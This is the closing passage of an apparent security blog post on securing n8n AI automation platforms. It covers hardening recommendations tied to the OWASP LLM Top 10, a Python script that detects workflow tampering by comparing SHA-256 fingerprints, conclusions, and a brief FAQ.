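                hits.append((wf.get("name", "?"), node.get("name", "?"), node_type))
    return hits
```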

Practical Recommendations

Securing AI-enabled automation platforms like n8n requires more than just reactive patching. It demands a proactive, layered approach that addresses both traditional attack surfaces and emerging risks specific to AI integrations. The following recommendations are based on real-world attack paths and aligned with the OWASP Top 10 for LLM applications:

- Vet Trusted Sources: Only import workflows, models, plugins, or custom nodes from trusted sources (e.g., official n8n community or verified vendors). Review nodes, code snippets, plugins, and model integrity (e.g., checksums) before activation to prevent supply chain attacks from malicious components (OWASP LLM03).

- Limit Permissions: Use role-based access controls, sandbox environments, and prompt validation to restrict workflow and extension actions (e.g., prevent access to sensitive APIs or unauthorized tool calls), mitigating excessive agency risks (OWASP LLM06).

- Secure AI Integrations: Avoid sending sensitive data (PII, PHI, business secrets) to external AI models or RAG systems. Use on-premises or privacy-focused AI services and validate inputs to prevent data leakage (OWASP LLM02).

- Update Regularly: Keep AI automation tools (e.g., n8n) and models updated to patch vulnerabilities, reducing risks from outdated components (OWASP LLM03).

- Monitor and Verify: Enable logging to detect anomalies in workflow behavior, vector database updates, or token usage. Set rate limits to prevent DoS attacks (OWASP LLM08, LLM10). Schedule a remote process to periodically export n8n workflows, generate a checksum (e.g., SHA-256), and compare it with the last valid checksum. Alert on discrepancies to detect potential malicious modifications.

- Learn Basic Security: Non-technical users should learn the basics of data minimization, input sanitization, and vector database security to reduce the risk of prompt injection, data poisoning, and embedding manipulation (OWASP LLM01, LLM04, LLM08).

- Perform Targeted Penetration Testing: Assess the security of the automation platform, including exposed services, authentication mechanisms, and integration points. Focus on misconfigurations, privilege escalation paths, and lateral movement opportunities within connected systems. Regular penetration tests provide a foundational understanding of your risk surface and help identify weaknesses before layering in AI-specific assessments.

- Conduct AI Red Team Assessments: Engage specialized vendors for regular AI Red Team assessments to identify vulnerabilities in workflows, models, and integrations, addressing a broad range of risks (OWASP LLM01–LLM10).

These recommendations are intended to guide both technical and non-technical teams in reducing exposure, improving operational resilience, and mitigating the unique threats these platforms face.
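The checksum comparison suggested under "Monitor and Verify" can be sketched in a few lines. This version fingerprints each workflow separately, so an alert names the workflow that changed. It serializes JSON canonically (sorted keys, fixed separators) so that key order in the export does not affect the hash. Dropping the top-level `createdAt`, `updatedAt` and `versionId` fields assumes that these change without a meaningful edit; adjust the set to what your exports contain. The baseline belongs on a separate system that the n8n host cannot write to.

```python
from __future__ import annotations

import hashlib
import json

# Assumed to change without a meaningful edit to the workflow logic.
VOLATILE_KEYS = {"createdAt", "updatedAt", "versionId"}


def workflow_fingerprints(workflows: list[dict]) -> dict[str, str]:
    """Map workflow id (or name) to the SHA-256 of its canonical JSON."""
    fingerprints = {}
    for wf in workflows:
        stable = {k: v for k, v in wf.items() if k not in VOLATILE_KEYS}
        canonical = json.dumps(stable, sort_keys=True, separators=(",", ":"),
                               ensure_ascii=False)
        wf_id = str(wf.get("id", wf.get("name")))
        fingerprints[wf_id] = hashlib.sha256(canonical.encode("utf-8")).hexdigest()
    return fingerprints


def compare_fingerprints(baseline: dict[str, str], current: dict[str, str]) -> list[str]:
    alerts = []
    for wf_id, digest in sorted(current.items()):
        if wf_id not in baseline:
            alerts.append(f"new workflow: {wf_id}")
        elif baseline[wf_id] != digest:
            alerts.append(f"workflow modified: {wf_id}")
    for wf_id in sorted(baseline.keys() - current.keys()):
        alerts.append(f"workflow deleted: {wf_id}")
    return alerts
```

A scheduled job would export the workflows, compute the fingerprints, compare them with the stored baseline and alert on any non-empty result. The baseline is updated only after a reviewed change.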

Conclusions

Automation platforms like n8n are quickly evolving from experimental tools to core business infrastructure. Their ability to integrate LLMs, RAG pipelines, cloud services, and internal systems makes them powerful enablers of productivity. But it also makes them high-value targets.

From a threat modeling perspective, these platforms concentrate a large amount of sensitive data, credentials, and operational logic into a single environment. In PASTA (Process for Attack Simulation and Threat Analysis) terms, the attack surface extends across multiple trust boundaries and touches numerous critical assets. A single compromise can cascade across connected services, leading to severe operational and reputational damage.

In this post, we went beyond theory and walked through a realistic exploitation scenario involving a compromised n8n deployment. We showed how an attacker could move from initial access to data exfiltration, manipulate automation flows and pivot into other systems. This is more than a theoretical concern. It presents a credible and significant threat in real-world scenarios.

The convenience of low-code platforms should not come at the cost of visibility or control. AI-enabled automation stacks can move fast and solve real problems, but they must be deployed with a full understanding of their risk profile. If they are compromised, they can act as a pivot point with access to credentials, internal APIs, cloud integrations, sensitive workflows and data.

Organizations deploying or managing these platforms should treat them as critical infrastructure. It is essential to implement appropriate hardening measures and routinely validate their effectiveness. This includes security assessments such as penetration tests and AI Red Team exercises, which can help uncover risks before an attacker does.

Automation platforms are no longer just about saving time and resources. They are now part of the attack surface. Treat them accordingly.

FAQs About AI Automation Security

Why is AI automation a security risk?

Because AI systems can access multiple environments and execute actions autonomously, increasing the attack surface.

What is an AI attack surface?

It includes all systems, data, APIs, and workflows that AI interacts with or controls.

Are AI agents secure?

AI agents can introduce risks such as over-permissioning, data leakage, and prompt injection if not properly secured.

How do you secure AI systems?

By applying zero-trust principles, limiting access, monitoring behavior, and enforcing governance controls.
